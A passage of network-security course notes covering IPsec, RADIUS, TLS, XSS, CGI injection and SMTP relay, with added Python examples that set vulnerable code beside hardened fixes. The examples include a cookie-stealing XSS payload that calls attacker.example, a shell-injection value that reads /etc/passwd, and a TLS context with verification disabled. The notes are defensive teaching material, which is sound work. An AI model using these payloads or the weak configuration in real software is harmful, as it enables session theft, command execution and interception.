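"""ESP transport vs tunnel mode, illustrative (toy cipher, fixed keys)."""
import hashlib
import hmac
import socket
import struct

IPPROTO_ESP = 50        # protocol number in the outer IP header
IPPROTO_UDP = 17
NEXT_HEADER_IPV4 = 4    # tunnel mode: the protected payload is a whole IPv4 packet
ICV_LEN = 16            # HMAC-SHA-256-128 (RFC 4868) truncates the tag to 128 bits


def ipv4_header(src, dst, proto, total_len):
    """Minimal 20-byte IPv4 header: no options, checksum left at 0 for brevity."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst))


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _keystream(key, spi, seq, n):
    """TOY keystream (SHA-256 over key, SPI, sequence, counter). Real ESP uses AES."""
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + struct.pack("!IIQ", spi, seq, ctr)).digest()
        ctr += 1
    return out[:n]


def esp_encapsulate(enc_key, auth_key, spi, seq, payload, next_header):
    """SPI | Seq | Enc(payload | padding | pad_len | next_header) | ICV."""
    pad_len = (-(len(payload) + 2)) % 4              # align the 2-byte trailer to 4 bytes
    plain = payload + bytes(pad_len) + bytes([pad_len, next_header])  # zero padding for simplicity
    header = struct.pack("!II", spi, seq)
    ciphertext = _xor(plain, _keystream(enc_key, spi, seq, len(plain)))
    icv = hmac.new(auth_key, header + ciphertext, hashlib.sha256).digest()[:ICV_LEN]
    return header + ciphertext + icv


def esp_decapsulate(enc_key, auth_key, esp):
    """Check the ICV before decrypting; returns (next_header, payload)."""
    header, ciphertext, icv = esp[:8], esp[8:-ICV_LEN], esp[-ICV_LEN:]
    expected = hmac.new(auth_key, header + ciphertext, hashlib.sha256).digest()[:ICV_LEN]
    if not hmac.compare_digest(expected, icv):
        raise ValueError("ESP ICV check failed (tampered packet or wrong key)")
    spi, seq = struct.unpack("!II", header)
    plain = _xor(ciphertext, _keystream(enc_key, spi, seq, len(ciphertext)))
    pad_len, next_header = plain[-2], plain[-1]
    return next_header, plain[: len(plain) - 2 - pad_len]


def transport_mode(enc_key, auth_key, spi, seq, inner):
    """Host-to-host: original header stays in the clear (proto -> ESP); payload is protected."""
    ip_hdr, payload = inner[:20], inner[20:]
    src, dst = socket.inet_ntoa(ip_hdr[12:16]), socket.inet_ntoa(ip_hdr[16:20])
    esp = esp_encapsulate(enc_key, auth_key, spi, seq, payload, ip_hdr[9])
    return ipv4_header(src, dst, IPPROTO_ESP, 20 + len(esp)) + esp


def tunnel_mode(enc_key, auth_key, spi, seq, inner, gw_src, gw_dst):
    """Gateway-to-gateway: the whole inner packet, header included, is encrypted."""
    esp = esp_encapsulate(enc_key, auth_key, spi, seq, inner, NEXT_HEADER_IPV4)
    return ipv4_header(gw_src, gw_dst, IPPROTO_ESP, 20 + len(esp)) + esp


def demo():
    """Constructed traffic: 10.0.1.5 -> 10.0.2.7 (UDP) via gateways 198.51.100.1 -> 203.0.113.1."""
    enc_key, auth_key = b"k" * 32, b"a" * 32          # assumed keys; IKE would derive these
    payload = b"\x04\xd2\x00\x35\x00\x0d\x00\x00hello"  # fake 8-byte UDP header + data
    inner = ipv4_header("10.0.1.5", "10.0.2.7", IPPROTO_UDP, 20 + len(payload)) + payload
    transport = transport_mode(enc_key, auth_key, 0x1000, 1, inner)
    tunnel = tunnel_mode(enc_key, auth_key, 0x2000, 1, inner, "198.51.100.1", "203.0.113.1")
    return inner, transport, tunnel


if __name__ == "__main__":
    inner, transport, tunnel = demo()
    print("transport outer src/dst:", socket.inet_ntoa(transport[12:16]), socket.inet_ntoa(transport[16:20]))
    print("tunnel    outer src/dst:", socket.inet_ntoa(tunnel[12:16]), socket.inet_ntoa(tunnel[16:20]))
```

Run it and the transport-mode packet still shows 10.0.1.5 and 10.0.2.7 to anyone sniffing the path, while the tunnel-mode packet shows only the two gateway addresses; flipping a single ciphertext bit makes `esp_decapsulate` reject the packet before any decryption happens.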
Working with RADIUS
Remote Authentication Dial-In User Service (RADIUS) is a
mechanism that provides centralized remote user
authentication, authorization, and accounting.
The centralized authentication, authorization, and accounting
features of RADIUS allow central administration of all aspects
of remote login. The accounting features allow administrators
to track usage and network statistics by maintaining a central
database.
A RADIUS server can be managed centrally, and the servers
that allow access to a network can verify with a RADIUS
server whether or not an incoming caller is authorized. In a
large network with many connections, this allows a single
server to perform all authentications.
A RADIUS server acts as either the authentication server or a
proxy client that forwards client requests to other
authentication servers. The initial network access server,
which is usually a VPN server or dial-up server, acts as a
RADIUS client by forwarding the VPN or dial-up client’s
request to the RADIUS server. RADIUS is the protocol that
carries the information between the VPN or dial-up client,
the RADIUS client, and the RADIUS server.
RADIUS hides only the User-Password attribute in the access-request
packet from the client to the server, and it does so by XORing the
password with MD5 hashes of the shared secret and the request
authenticator, not with a modern cipher. The remainder of the packet
(User-Name, NAS identifiers, the reply) is unencrypted, so the shared
secret must be strong and RADIUS traffic should stay on a protected
management network or be wrapped in IPsec or RadSec (RADIUS over TLS).
RADIUS uses UDP transport: port 1812 for authentication and 1813 for
accounting (older deployments use 1645/1646).
A RADIUS server communicating with an ISP to allow access to a remote user. Notice that the remote server is functioning as a client to the RADIUS server. This allows centralized administration of access rights.
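What "only the password is encrypted" means in practice is easiest to see by building an Access-Request. The following is an added example, not part of the slides: it implements the RFC 2865 User-Password hiding (16-byte blocks XORed with MD5(secret + previous block), seeded by the Request Authenticator), assembles a packet with User-Name and NAS-IP-Address attributes, and then parses the packet the way a sniffer on the path would. The user name, password and shared secret are constructed values.

```python
"""RFC 2865 Access-Request: User-Password hiding and what stays in the clear."""
import hashlib
import os
import struct

ACCESS_REQUEST = 1
ATTR_USER_NAME = 1
ATTR_USER_PASSWORD = 2
ATTR_NAS_IP_ADDRESS = 4


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def hide_password(password, secret, authenticator):
    """c1 = p1 XOR MD5(S + RA); c_i = p_i XOR MD5(S + c_{i-1}); password NUL-padded to 16n."""
    if len(authenticator) != 16:
        raise ValueError("Request Authenticator must be 16 bytes")
    if not 1 <= len(password) <= 128:
        raise ValueError("User-Password must be 1..128 bytes")
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        block = _xor(padded[i:i + 16], hashlib.md5(secret + prev).digest())
        out += block
        prev = block
    return out


def recover_password(hidden, secret, authenticator):
    """Inverse: the chaining value is the *hidden* block, so anyone with the secret and the
    captured packet recovers the password with no extra state."""
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        block = hidden[i:i + 16]
        out += _xor(block, hashlib.md5(secret + prev).digest())
        prev = block
    return out.rstrip(b"\x00")   # strip NUL padding (passwords never contain NUL)


def _attr(attr_type, value):
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def build_access_request(identifier, secret, username, password, nas_ip, authenticator=None):
    """Code | Identifier | Length | Request Authenticator(16) | attributes."""
    authenticator = authenticator or os.urandom(16)
    attrs = (_attr(ATTR_USER_NAME, username)
             + _attr(ATTR_USER_PASSWORD, hide_password(password, secret, authenticator))
             + _attr(ATTR_NAS_IP_ADDRESS, bytes(int(o) for o in nas_ip.split("."))))
    header = struct.pack("!BBH", ACCESS_REQUEST, identifier, 20 + len(attrs)) + authenticator
    return header + attrs


def parse_packet(packet):
    """Return (code, identifier, authenticator, {attr_type: raw value})."""
    code, identifier, length = struct.unpack("!BBH", packet[:4])
    attrs, pos = {}, 20
    while pos < length:
        attr_type, attr_len = packet[pos], packet[pos + 1]
        attrs[attr_type] = packet[pos + 2:pos + attr_len]
        pos += attr_len
    return code, identifier, packet[4:20], attrs


def sniffer_view(packet, secret=None):
    """What a capture reveals: User-Name and NAS address always; the password if the secret is known."""
    _, _, authenticator, attrs = parse_packet(packet)
    view = {"User-Name": attrs[ATTR_USER_NAME].decode(),
            "NAS-IP-Address": ".".join(str(b) for b in attrs[ATTR_NAS_IP_ADDRESS])}
    if secret is not None:
        view["User-Password"] = recover_password(attrs[ATTR_USER_PASSWORD], secret, authenticator).decode()
    return view


if __name__ == "__main__":
    pkt = build_access_request(7, b"shared-secret", b"alice", b"Tr0ub4dor&3", "192.168.0.1")
    print(sniffer_view(pkt))                    # user name in the clear
    print(sniffer_view(pkt, b"shared-secret"))  # password too, given the secret
```

The takeaway is that the hiding is keyed only by the shared secret: a weak or reused secret, combined with a capture of the UDP exchange, exposes every user's password, which is why the secret should be long and random and the RADIUS segment protected.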
TACACS+
Terminal Access Controller Access Control System (TACACS) is a client/server-oriented protocol, and it
operates in a similar manner to RADIUS.
Extended TACACS (XTACACS) replaced the original and combined authentication
and authorization with logging to enable auditing.
TACACS+ is a separate, incompatible protocol developed by Cisco, and although RADIUS
performs in much the same manner, TACACS+ is used almost exclusively in Cisco environments.
RADIUS is more of a generic standard used by many different companies. TACACS+ is gaining
ground, however.
The most current method or level of TACACS is TACACS+. TACACS+ allows
credentials to be accepted from multiple methods, including Kerberos.
TACACS+ provides authentication, authorization, and accounting (AAA) as separate functions,
which makes it well suited to per-command authorization on network devices.
TACACS+ relies on TCP over port 49 (the original TACACS used UDP 49) and obfuscates the
entire packet body with an MD5-based keystream derived from the shared secret, whereas RADIUS
hides only the password.
Securing Internet Connections
Working with Ports and Sockets
TCP/IP establishes connections and circuits using a
combination of the IP address and a port.
A port is an interface that is used to connect to a device.
Sockets are a combination of the IP address and the port.
The socket identifies which application will respond to the
network request.
For example, if you attempt to connect to a remote system
with the IP address 192.168.0.100, which is running a
website, you'll use port 80 by default. The combination of
these two elements gives you a socket: 192.168.0.100:80.
IP is used to route the information through the network.
The four layers of TCP/IP encapsulate the information into a
valid IP packet that is then transmitted across the network.
The figure to the right illustrates the key components of a
TCP packet requesting the home page of a website. The
destination port is the port the data is sent to; for a web
request it is 80. The source port is an ephemeral port chosen
by the client (1024 in the figure). The data field contains
the value GET /, which requests the home or starting page
from the web server. In essence, this request asked for the
home page of 192.168.0.100 port 80. The reply is formed into
another packet, passed down to IP and sent back to the
originating system with the ports reversed: destination 1024,
source 80.
The connections to most services using TCP/IP are based on
this port model; a firewall rule is essentially a decision
about which sockets may be reached from where.
Working with E-Mail
The most common e-mail systems use the following
protocols, which use TCP for session establishment:
Simple Mail Transfer Protocol: SMTP is a mail delivery
protocol that is used to send e-mail from an e-mail client
to an e-mail server as well as between e-mail servers. SMTP
uses port 25 for server-to-server transfer; clients submit
mail on port 587 (with STARTTLS) or 465 (implicit TLS).
Post Office Protocol: POP retrieves the mail that SMTP has
delivered to the user's mailbox. POP3, the current version,
transfers messages from the waiting post office to the
e-mail client, normally deleting them from the server. POP3
uses port 110 (995 over TLS).
Internet Message Access Protocol: IMAP is the newer of the
two retrieval protocols and the more widely used. Unlike POP,
IMAP keeps messages on the e-mail server, where the client
manipulates them in place, and it allows messages to be
downloaded selectively based on search criteria. The current
version, IMAP4, uses port 143 (993 over TLS).
All three protocols send credentials in the clear unless TLS
is used, so require STARTTLS or the TLS ports.
The web services covered on the next slide are offered in
conjunction with browser-side programs such as Flash and Java.
These services use either a socket to communicate or a program
that responds to commands through the browser. If your
browser can be controlled by an application, your system is
at great risk of attack. Servers are also vulnerable to this
issue because they must process requests from browsers for
information or data.
The process of transferring an e-mail message.
Working with the Web
There are two common ways to provide secure connections
between a web client and a web server:
Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are
the most widely used cryptographic protocols for conveying
information between a web client and a server. TLS is the IETF
successor to SSL (TLS 1.0 replaced SSL 3.0 in 1999); the two are not
interoperable, although a TLS client may fall back to SSL for
compatibility. The client initiates the handshake, the server
responds with its certificate, and the two negotiate a cipher suite:
the key exchange, the encryption algorithm (AES today; Triple DES
historically) and the integrity algorithm. All SSL versions and
TLS 1.0/1.1 are deprecated because of known attacks; deploy TLS 1.2
or 1.3. SSL/TLS is not tied to a port; it protects whatever TCP
service runs over it.
HTTP Secure (HTTPS) is HTTP carried over SSL/TLS between two systems
that use the Web. It protects the connection, and all traffic between
the two systems is encrypted and authenticated. HTTPS uses port 443
and TCP for connections.
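The handshake only protects you if the client actually verifies the server and refuses the deprecated versions. The following is an added example using Python's standard `ssl` module, not code from the slides: it builds the weak client configuration that is still common in scripts (certificate and hostname checks switched off) beside a hardened one pinned to TLS 1.2 or better, and an audit routine that reports what is wrong with a given context. No network connection is made.

```python
"""TLS client contexts: a weak configuration, a hardened one, and an audit of either."""
import ssl


def legacy_context():
    """The common mistake: any certificate is accepted, so an on-path attacker can
    present their own and read everything."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False        # must be cleared before verify_mode can be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_context():
    """create_default_context() already requires a valid certificate chain and hostname
    match against the system trust store; we additionally refuse anything below TLS 1.2."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def audit_context(ctx):
    """Return a list of findings; an empty list means the context passes."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("certificate verification disabled")
    if not ctx.check_hostname:
        findings.append("hostname check disabled")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("protocol floor below TLS 1.2")
    return findings


def hardened_floor_is_tls12():
    return int(hardened_context().minimum_version) == 0x0303   # TLS 1.2 version number


if __name__ == "__main__":
    print("legacy  :", audit_context(legacy_context()))
    print("hardened:", audit_context(hardened_context()))
```

Use `hardened_context()` when wrapping a socket (`ctx.wrap_socket(sock, server_hostname=host)`); passing `server_hostname` is what lets the hostname check run.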
ActiveX
ActiveX is a technology that was implemented by Microsoft.
ActiveX allows customized controls, icons, and other features to increase
the usability of web enabled systems.
ActiveX uses a method called Authenticode for security. Authenticode is
code-signing technology: the publisher signs the control with a certificate
and the browser validates the signature before installing it. A valid
signature proves who published the control, not that the control is safe.
ActiveX runs on the client, with the full privileges of the browser user,
which is why it was never supported in modern browsers and was retired along
with Internet Explorer.
Web browsers can be configured so that they require confirmation to
accept an ActiveX control. However, many users don’t understand these
confirmation messages when they appear, and they automatically accept
the components.
Automatically accepting an ActiveX component or control creates the
opportunity for security breaches on a client system when the control is
used because an ActiveX control contains programming instructions that
can contain malicious code or create vulnerabilities in a system.
Buffer Overflows
Perhaps the most popular method of privilege escalation is a buffer-overflow attack. Buffer
overflows cause disruption of service and lost data.
Buffer overflows occur when an application writes more data into a fixed-size buffer than it was
sized to hold, because it trusted the length of its input.
This situation can cause:
An application to terminate. The termination may leave the system
sending the data with temporary access to privileged levels in the attacked
system.
The overwriting of data or memory storage.
A denial of service due to overloading the input buffer’s ability to cope
with the additional data.
Or the originator can execute arbitrary code, often at a privileged level.
A buffer overflow is targeted toward an individual machine.
Common Gateway Interface
Common Gateway Interface (CGI) is an older interface by which a web server runs an
external program (typically a Perl, shell or C script) to handle a request. It was
used extensively in early web systems.
CGI scripts could be used to capture data from a user using simple forms.
CGI scripts are not widely used in new systems and have been replaced by server-side
frameworks on the server and by Java, ActiveX and other technologies on the client.
The CGI script ran on the web server, and it interacted with the client browser.
Vulnerabilities in CGI scripts are the result of their inherent ability to do what they are
told: form fields and query parameters are handed to the script, and a script that passes
unvalidated input to a shell, a file path or a database executes whatever an attacker embeds
in it. If a CGI script is written to wreak havoc (or carries extra code added to it by a
miscreant) and it is executed, your systems will suffer.
The best protection is not to run CGI scripts you have not reviewed, to remove the sample
scripts shipped with the web server, and to validate every input a script accepts.
Cookies
Cookies are small pieces of text that a browser stores on the user's hard disk. They hold
information on a web client for future sessions with a web server.
A cookie will typically contain information about the user. It is used to provide a
persistent, customized web experience for each visit and to track a user's browsing
habits. A cookie can contain the history of a client to improve customer service.
A tracking cookie is a particular type of persistent cookie that stays around beyond the visit,
whereas a session cookie stays around only for the particular visit to a website.
The danger in maintaining session information in cookies is that the cookie often is the
session: anyone who obtains it can impersonate the user. Browsers send a cookie only to the
domain that set it, but a cookie can still be stolen by script injected into that site
(cross-site scripting), by sniffing an unencrypted connection, or by reading it from the disk
of a shared machine.
The information stored in a cookie is not typically encrypted and might be vulnerable to
attack.
The strongest client-side protection is to refuse or limit cookies. Almost every browser offers
the option to enable or disable cookies, and if you enable them you can usually choose whether
to accept or reject all or only those from the originating (first-party) server. Site operators
should set session cookies with the Secure, HttpOnly and SameSite attributes, so that they are
sent only over HTTPS, cannot be read by script, and are not attached to cross-site requests.
Cross-site scripting (XSS)
Cross-site scripting (XSS) is a vulnerability in which an attacker injects script into a
web page that other users view, so that the victim's browser runs the attacker's code in
the context of the trusted site.
XSS is typically found in web applications that echo user-supplied input (a search term,
a comment, a URL parameter) into a page without encoding it. In a reflected attack the user
is tricked into visiting a crafted link; in a stored attack the payload is saved on the
server and served to every visitor.
XSS poses the most danger when a user accesses a financial
organization's site using his or her login credentials. The problem is not
that the attacker will take over the server. It is more likely that the attacker
will take over the client's session, reading the session cookie or performing actions
as the user, and so gain information about the legitimate user that is not publicly
available.
The best protection against cross-site scripting is for developers to encode output for
the context it lands in (HTML body, attribute, JavaScript, URL), validate input, mark session
cookies HttpOnly and deploy a Content Security Policy. Users can reduce their exposure by
disabling or restricting the running of scripts.
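To make the session-takeover scenario concrete, the following added example (not part of the slides) shows a page fragment that reflects a query parameter unencoded, the same fragment with context-appropriate encoding, a link renderer that also allowlists the URL scheme, and the Set-Cookie header and response headers that limit what a successful injection can steal. The page shape, cookie name and CSP are assumptions for illustration; the payload is a constructed cookie-exfiltration script.

```python
"""Reflected XSS: vulnerable vs encoded rendering, plus cookie and header hardening."""
import re
from html import escape
from urllib.parse import urlparse

TOKEN_RE = re.compile(r"^[A-Za-z0-9_-]{16,128}$")   # what an opaque session id should look like

# Constructed attacker payload: ships document.cookie to a host the attacker controls
PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"


def render_greeting_vulnerable(name):
    """Echoes the query parameter straight into the HTML body."""
    return f"<p>Hello, {name}!</p>"


def render_greeting_safe(name):
    """HTML-entity encoding for the element-body context; quote=True also covers attributes."""
    return f"<p>Hello, {escape(name, quote=True)}!</p>"


def render_link_safe(text, url):
    """Attribute context: encoding alone is not enough for href, because a javascript: URL
    is valid attribute text. Allowlist the scheme as well."""
    if urlparse(url).scheme not in ("http", "https"):
        raise ValueError("disallowed URL scheme")
    return f'<a href="{escape(url, quote=True)}">{escape(text, quote=True)}</a>'


def session_cookie_header(session_id):
    """HttpOnly: script cannot read it, so the payload above exfiltrates nothing.
    Secure: never sent over plain HTTP. SameSite: not attached to cross-site requests."""
    if not TOKEN_RE.match(session_id):
        raise ValueError("session id must be an opaque token")
    return f"Set-Cookie: session={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


def security_headers():
    """Defence in depth: CSP blocks inline script even where encoding was missed."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    print(render_greeting_vulnerable(PAYLOAD))   # script tag survives: executes in the victim's browser
    print(render_greeting_safe(PAYLOAD))         # rendered as literal text
    print(session_cookie_header("a" * 32))
```

Encoding is per context: `escape()` is right for HTML body and quoted attributes, but a value placed inside a `<script>` block or a URL needs that context's encoding instead, which is why templating engines that auto-escape by context are preferred over hand-built strings.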
Input Validation
Anytime a user must supply values in a session, validation of the
data entered should be done.
Many vendors, however, have fallen prey to input validation
vulnerabilities within their code. In some instances, empty
values have been accepted, while others have allowed privilege
escalation if certain backdoor passwords were used.
The best protection against input validation vulnerabilities is for
developers to follow best practices and validate every value entered, on
the server side: check type, length, range and format against an allowlist,
and reject empty or unexpected values rather than trying to clean them up.
As an administrator, when you learn of an input validation
vulnerability with any application on your system, you should
stop using it, or isolate it from untrusted users, until a patch has
been released and installed.
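The CGI discussion above and this input-validation slide describe the same failure from two sides, so one added example serves both (it is not code from the slides). It models a CGI-style "ping this host" tool: the vulnerable version concatenates the parameter into a shell command string, the hardened version validates the host against an allowlist (IP literal or RFC 1123 hostname), validates the count as a bounded integer, and builds an argv list that no shell interprets. The tool and its parameters are assumed for illustration, and the commands are only built, never executed.

```python
"""CGI-style parameter handling: shell injection vs allowlist validation."""
import ipaddress
import re

# RFC 1123 hostname: labels of 1-63 alphanumerics/hyphens, no leading/trailing hyphen, 253 max
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def build_ping_command_vulnerable(host):
    """Classic CGI bug: the string is handed to a shell, so ';', '|', '`' in `host`
    become additional commands."""
    return "ping -c 1 " + host


def validate_host(value):
    """Allowlist: an IP literal or a hostname. Empty, non-string and oversized values
    are rejected outright instead of being 'cleaned'."""
    if not isinstance(value, str) or value == "":
        raise ValueError("host parameter is required")
    value = value.strip()
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value
    raise ValueError(f"invalid host: {value!r}")


def validate_int(value, lo, hi):
    """Numeric parameter: must be a plain integer string within [lo, hi]; '', '1e3',
    '10abc' and out-of-range values are all rejected."""
    if not isinstance(value, str) or not re.fullmatch(r"-?\d+", value.strip()):
        raise ValueError("integer required")
    n = int(value)
    if not lo <= n <= hi:
        raise ValueError(f"out of range {lo}..{hi}")
    return n


def build_ping_command_safe(host, count="1"):
    """argv list (run with subprocess.run(argv) and no shell) plus validated values:
    shell metacharacters in the input are inert data, not syntax."""
    return ["ping", "-c", str(validate_int(count, 1, 5)), validate_host(host)]


if __name__ == "__main__":
    evil = "8.8.8.8; cat /etc/passwd"
    print(build_ping_command_vulnerable(evil))      # two commands for the shell
    try:
        build_ping_command_safe(evil)
    except ValueError as exc:
        print("rejected:", exc)
```

The two defences are independent: the argv list alone stops command injection, but validation is still needed so that the parameter cannot become an option (`-f`) or an unbounded value to whatever program receives it.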
Java Applets
A Java applet is a small, self-contained Java program that is downloaded from a server to a
client and then run from the browser. The client browser must have the ability to run Java
applets in a Java virtual machine (JVM) on the client. Java applets were used extensively on
websites and were popular tools for website development; modern browsers no longer run them,
and the Java browser plug-in was removed in Java 11.
Signed applets are similar to unsigned Java applets-with one key difference:
Unsigned Java applets use sandboxes to enforce security. A sandbox protects the system from
malicious software by enforcing the execution of the application within the sandbox and preventing
access to the system resources outside the sandbox. The concept of a Web script that runs in its own
environment and cannot interfere with any other process is known as a sandbox.
A signed applet does not run in the Java sandbox, and it has higher system access capabilities. Signed
applets are not usually downloaded from the Internet; this type of applet is usually provided by in-house or
custom-programming efforts. The digital signature lets the browser verify who published the applet, and if
the signature is verified and the user accepts the publisher, the applet is installed with full privileges.
Users should never accept a signed applet unless they are sure that the provider is trusted, because a
signature proves origin, not safety.
Errors in the Java virtual machine that runs in the applications may allow some applets to run outside
of the sandbox. When this occurs, the applet is unsafe and may perform malicious operations.
From a user’s standpoint, the best defense is to make certain you run only applets from reputable sites
you’re familiar with. From an administrator’s standpoint, you should make certain programmers
adhere to programming guidelines when creating the applets.
JavaScript
JavaScript is a scripting language that runs inside the browser's JavaScript engine
when a page containing it is loaded.
It does not have the general operating-system access of a compiled language such as
C: the browser confines it to the page's own origin (the page's DOM, that site's cookies,
and network requests to the same origin unless the site permits otherwise).
Even so, JavaScript downloaded from a website and executed within the browser can do
real damage: it can read and send any data the page can see (including session cookies
not marked HttpOnly), redirect the user, or exploit a bug in the browser itself to escape
the sandbox. Malicious scripts reach users through compromised or attacker-controlled
sites and through cross-site scripting.
Despite the name, JavaScript is unrelated to Java applets, which require a separate Java
virtual machine plug-in to run.
Popups
A popup occurs when a website opens a new browser window in the foreground.
Popups are an annoyance, and some contain inappropriate content or entice the
user to download malware.
Some popup blockers may delete the information already entered by reloading the page, causing
the users unnecessary grief.
Many popup blockers are integrated into vendor toolbars.
Field help for fill-in forms is often in the form of a popup.
A Popunder occurs when a Web site is opened in the background. Popunders are in the
same family as popups and should be prevented by enabling a popup blocker on the
user’s computer.
You can adjust the settings on popup blockers to meet the organizational policy or to
best protect the user environment:
High settings might prevent application or program installation.
Medium will block most automatic popups but still allow functionality.
You can circumvent popup blockers in various ways:
Most popup blockers block only the JavaScript; therefore, technologies such as Flash bypass the
popup blocker.
On many Internet browsers, holding down the Ctrl key while clicking a link will allow it to bypass
the popup filter.
SMTP Relay
SMTP relay is a feature designed into many e-mail servers that
allows them to accept mail addressed to other domains and forward
it on to the server responsible for those domains.
The legitimate purpose of a dedicated relay (or gateway) server is
to protect the primary e-mail server: it accepts mail from the
Internet, filters viruses and spam, and absorbs port scans and
connection floods before anything reaches the internal mailbox server.
Initially, the SMTP relay function was intended to help bridge
between systems. This capability allows e-mail connections
between systems across the Internet to be made easily.
Unfortunately, this feature has been abused to generate a great
deal of spam on the Internet: an open relay accepts mail from
anyone, addressed to anyone.
You should configure your e-mail server to refuse relaying except
for mail addressed to your own domains, mail from authenticated
users, and mail from trusted internal networks, because an open
relay results in untraceable, unwanted, unsolicited e-mail being
sent in your name and in your server being blacklisted.
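The relay decision a mail server makes at RCPT TO is small enough to write down. The following is an added example, not from the slides: an open-relay policy beside a restricted one that allows only local delivery, authenticated submission and trusted networks, applied to a constructed log of SMTP sessions to count how much off-site mail each policy would relay. The domains, networks and session records are constructed.

```python
"""SMTP relay policy: open relay vs restricted relay, evaluated over constructed sessions."""
import ipaddress

LOCAL_DOMAINS = {"example.com", "mail.example.com"}                 # assumed: our own domains
TRUSTED_NETS = [ipaddress.ip_network("192.168.0.0/16")]             # assumed: internal LAN


def parse_address(addr):
    """Return the lower-cased domain of a plain user@domain address; reject anything odd."""
    local, sep, domain = addr.strip().rpartition("@")
    if not sep or not local or not domain or "@" in local or any(c in domain for c in " <>,;"):
        raise ValueError(f"malformed address: {addr!r}")
    return domain.lower()


def relay_decision_open(client_ip, authenticated, rcpt):
    """The misconfiguration: RCPT TO is accepted for any domain from anyone."""
    return True, "250 OK"


def relay_decision(client_ip, authenticated, rcpt,
                   local_domains=LOCAL_DOMAINS, trusted_nets=TRUSTED_NETS):
    """Accept only (1) mail for our own domains, (2) authenticated submission,
    (3) clients on trusted networks. Everything else is refused with a permanent error."""
    domain = parse_address(rcpt)
    if domain in local_domains:
        return True, "250 OK (local delivery)"
    if authenticated:
        return True, "250 OK (authenticated relay)"
    if any(ipaddress.ip_address(client_ip) in net for net in trusted_nets):
        return True, "250 OK (trusted network)"
    return False, "554 5.7.1 Relay access denied"


# Constructed session log: (client IP, SMTP AUTH succeeded?, RCPT TO)
SESSIONS = [
    ("203.0.113.9", False, "victim1@other.example"),    # spammer probing for an open relay
    ("203.0.113.9", False, "victim2@other.example"),
    ("198.51.100.4", False, "alice@example.com"),       # legitimate inbound mail for us
    ("192.168.10.5", False, "partner@other.example"),    # internal host sending outbound
    ("203.0.113.77", True, "friend@other.example"),      # roaming user with SMTP AUTH
]


def count_relayed_offsite(policy, sessions=SESSIONS):
    """How many RCPT commands for foreign domains the policy would accept."""
    relayed = 0
    for ip, authed, rcpt in sessions:
        accepted, _ = policy(ip, authed, rcpt)
        if accepted and parse_address(rcpt) not in LOCAL_DOMAINS:
            relayed += 1
    return relayed


if __name__ == "__main__":
    print("open relay forwards :", count_relayed_offsite(relay_decision_open))
    print("restricted forwards :", count_relayed_offsite(relay_decision))
```

Real servers express the same three rules as configuration (for example a list of relay domains, a requirement for SMTP AUTH, and a trusted-network list); whatever the product, testing it from an outside address with a foreign recipient should produce the 554 response.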
Working with File Transfer Protocol
FTP servers provide user access to upload or download files between client systems and
a networked FTP server. FTP servers include many potential security issues, including
anonymous file access and unencrypted authentication.
FTP has three separate functions. FTP is a protocol, a client, and a server.
The client system runs a program called FTP.
The server runs a service called FTP server.
The FTP client and server communicate using the FTP protocol.
The client requests a connection to a server that runs the FTP service.
The client and server communicate using a protocol that defines the command structure and interactions
between the client and server.
Early FTP servers based security on the honor system. Most logons to an FTP site used
the anonymous logon: conventionally the user name was anonymous and the password was
the user's e-mail address. In this situation, the only security offered is what the
operating system's file permissions enforce.
The major security vulnerability of FTP is that the user ID and password are not
encrypted and are sent in clear text, as is the file data itself. This leaves them subject to
packet capture, a major security breach, especially if you are connecting to an FTP server
across the Internet. FTP's separate data connection (active mode from server port 20, or
passive mode on a high port) also complicates firewalling.
The protection is to use SFTP or FTPS instead. Secure FTP (SFTP) is the file-transfer
subsystem of Secure Shell (SSH) on TCP port 22 and is a different protocol from FTP; FTPS is
FTP protected with Transport Layer Security (TLS) or its predecessor Secure Sockets Layer
(SSL), as specified in RFC 4217.
Understanding Network Protocols
Simple Network Management Protocol (SNMP) is used to monitor network devices.
SNMP is used for monitoring the health of network equipment, computer equipment,
and devices like UPSs. Agents listen on UDP port 161, and traps are sent to the manager on
UDP port 162. SNMPv1 and v2c authenticate with community strings sent in the clear (and many
devices ship with public/private), so use SNMPv3 with authentication and privacy and restrict
port 161 to management hosts.
Internet Control Message Protocol (ICMP) is used for destination and error reporting
functions in TCP/IP.
ICMP is routable and is used by programs such as ping and traceroute.
ICMP is used for carrying error, control and informational packets between hosts.
ICMP is one of the favorite protocols used for DoS attacks (ping floods and smurf
amplification). Rather than disabling ICMP wholesale at the router, which also breaks
path-MTU discovery and troubleshooting, filter echo requests from the Internet, block
directed broadcasts, and rate-limit what remains.
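Detecting an ICMP flood from logs rather than blocking the protocol outright is a matter of counting echo requests per source per time window. The following added example (not from the slides) parses a constructed firewall log format, flags sources that exceed a threshold of echo requests in a one-second window, and separately flags requests aimed at a broadcast address, the smurf pattern. The log format, the traffic and the ".255" broadcast heuristic are constructed assumptions; a real check would use the subnet mask.

```python
"""Rate-based ICMP echo-flood and smurf detection over firewall log lines."""
import re
from collections import defaultdict
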